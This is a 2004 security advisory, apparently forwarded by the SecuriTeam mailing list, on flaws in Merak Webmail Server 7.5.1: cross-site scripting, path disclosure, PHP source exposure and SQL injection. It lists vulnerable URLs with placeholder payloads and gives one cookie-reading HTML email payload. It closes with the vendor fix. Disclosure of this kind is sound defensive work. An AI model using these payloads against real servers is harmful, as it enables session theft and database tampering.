[NT] Merak Webmail Server Multiple Vulnerabilities

From: SecuriTeam (support_at_securiteam.com)
Date: 08/19/04

  • Next message: SecuriTeam: "[UNIX] PHP-FUSION Various Vulnerabilities" 
    To: list@securiteam.com
Date: 19 Aug 2004 11:32:20 +0200

    The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
    - - promotion

    The SecuriTeam alerts list - Free, Accurate, Independent.

    Get your security news from a reliable source.
    http://www.securiteam.com/mailinglist.html

    - - - - - - - - -

      Merak Webmail Server Multiple Vulnerabilities
    ------------------------------------------------------------------------

    SUMMARY

     <http://www.merakmailserver.com/Products/Webmail_Server_Software/> Merak
    Webmail Server Software "provides users with the ability to access their
    email via a browser using an 'Outlook 2002 or 2003' style interface as
    well as many others, or via their Wireless WAP-enabled device". The Merak
    Webmail Server has been found to contain multiple vulnerabilities ranging
    from Cross-Site Scripting issues, Full path disclosure, exposure of PHP
    files, to SQL-Injections.

    DETAILS

    Vulnerable Systems:
     * Merak Mail Server version 7.5.1 and prior

    Immune Systems:
     * Merak Mail Server version 7.5.2 or newer

    Cross-Site Scripting:
    There are many input validation holes in the Merak Webmail server. An
    attacker can perform using these holes an XSS attack.

    Examples:
    /address.html?id=[id]&sort=name&selectsort=&global=&showgroups=&showlite=&category=">[XSS]&cserver=&ext=
    /address.html?id=[id]&sort=name&selectsort=&global=&showgroups=&showlite=&category=&cserver=">[XSS]&ext=
    /address.html?id=[id]&sort=name&selectsort=&global=&showgroups=&showlite=&category=&cserver=&ext=">[XSS]
    /address.html?id=[id]&sort=&selectsort=&global=">[XSS]&showgroups=&showlite=&category=&cserver=&ext=
    /address.html?id=[id]&sort=&selectsort=&global=&showgroups=">[XSS]&showlite=&category=&cserver=&ext=
    /address.html?id=[id]&sort=&selectsort=&global=&showgroups=&showlite=">[XSS]&category=&cserver=&ext=
    /settings.html?autoresponder=1&id=[id]&spage=">[XSS]
    /settings.html?autoresponder=">[XSS]&id=[id]&spage=0
    /readmail.html?id=[id]&folder=">[XSS]

    The next files (attachment.html, calendar.html), can be accessed without
    knowing user's session ID number, making it easier to use them for
    exploitation:
    /attachment.html?attachmentpage_text_error=">[XSS]
    /calendar.html?id=1&schedule=admin%40merakdemo.com&cv=n&folder=">[XSS]
    /calendar.html?id=1&schedule=koko%40merakdemo.com&sf=addevent&cv=d&ct=">[XSS]
    /calendar.html?id=[id]&cv=">[XSS]&ct=[ct]&sf=addevent&ESdhour=8

    It is possible to inject a XSS in messages.

    Example:
    Open your mail and write a new message of the sorts of:
    < IMG alt="" hspace=0 src="javascript:alert(document.cookie)"
    align=baseline border=0>< IFRAME src="http://www.google.com"></body>
    </html> </IFRAME>

    Click on the HTML message checkbox (in order to send it in HTML format).

    The XSS will be executed on your browser. If you send the message, the XSS
    will be also executed once the victim reads the email.

    Full Path Disclosure
    Some variables of adress.html can cause that a remote user may be able to
    determine the installation path.

    Example:
    Accessing the following URL:
    /mail/address.html?id=[id]&sort=criolabs&selectsort=criolabs&global=criolabs&showlite=criolabs&category=criolabs&cserver=&ext=, will return:

    Warning: reset(): Passed variable is not an array or object in C:\Archivos
    de programa\Merak\html\mail\address.html on line 565

    Warning: Variable passed to each() is not an array or object in
    C:\Archivos de programa\Merak\html\mail\address.html on line 566

    Warning: reset(): Passed variable is not an array or object in C:\Archivos
    de programa\Merak\html\mail\inc\function.address.php on line 100

    Warning: Variable passed to each() is not an array or object in
    C:\Archivos de programa\Merak\html\mail\inc\function.address.php on line
    101

    Another example is to access the following URL:
    /calendar.html?id=6213dcc45fdbccc9af207d32722b93a7&cv=%22criolabs&ct='criolabs&sf='criolabs, which will return:

    Warning: mktime(): Windows does not support negative values for this
    function in C:\Archivos de
    programa\Merak\html\mail\inc\function.calendar.php on line 413

    Warning: date(): Windows does not support dates prior to midnight
    (00:00:00), January 1, 1970 in C:\Archivos de
    programa\Merak\html\mail\inc\function.calendar.php on line 413

    Warning: mktime(): Windows does not support negative values for this
    function in C:\Archivos de
    programa\Merak\html\mail\inc\function.calendar.php on line 417

    Warning: mktime(): Windows does not support negative values for this
    function in C:\Archivos de
    programa\Merak\html\mail\inc\function.calendar.php on line 420

    Warning: date(): Windows does not support dates prior to midnight
    (00:00:00), January 1, 1970 in C:\Archivos de
    programa\Merak\html\mail\inc\function.calendar.php on line 420

    Warning: date(): Windows does not support dates prior to midnight
    (00:00:00), January 1, 1970 in C:\Archivos de
    programa\Merak\html\mail\inc\function.calendar.php on line 350

    Exposure of PHP Files:
    The server allows a remote user to download any PHP file from the server.
    Normally web servers will execute the content found in the PHP file
    instead of allow their download.

    Examples:
    http://localhost:32000/mail/inc/function.php
    http://localhost:32000/mail/inc/function.view.php

    SQL Injection:
    There are numerous SQL Injection vulnerabilities in the calendar.html.
    These SQL injection vulnerabilities allow a remote user to inject
    arbitrary SQL commands.

    Examples:
    /calendar.html?id=1'&schedule=[SQL]
    /calendar.html?id=1&schedule=koko%40merakdemo.com&sf=addevent&cv=d&ct=';'&Eid=criolabs'

    Disclosure Timeline:
    Vendor Contacted: Wed, 04 Aug 2004
    Thu, 12 Aug 2004: Release of Merak Mail Server 7.5.2

    Solution:
    Download the new release available at:
    <http://www.MerakMailServer.com/Download/>
    http://www.MerakMailServer.com/Download/.

    ADDITIONAL INFORMATION

    The information has been provided by Criolabs staff.
    The original article can be found at:
    <http://www.criolabs.net/advisories/Merak.txt>
    http://www.criolabs.net/advisories/Merak.txt

    ========================================

    This bulletin is sent to members of the SecuriTeam mailing list.
    To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@securiteam.com
    In order to subscribe to the mailing list, simply forward this email to: list-subscribe@securiteam.com

    ====================
    ====================

    DISCLAIMER:
    The information in this bulletin is provided "AS IS" without warranty of any kind.
    In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.

  • Next message: SecuriTeam: "[UNIX] PHP-FUSION Various Vulnerabilities"

    Relevant Pages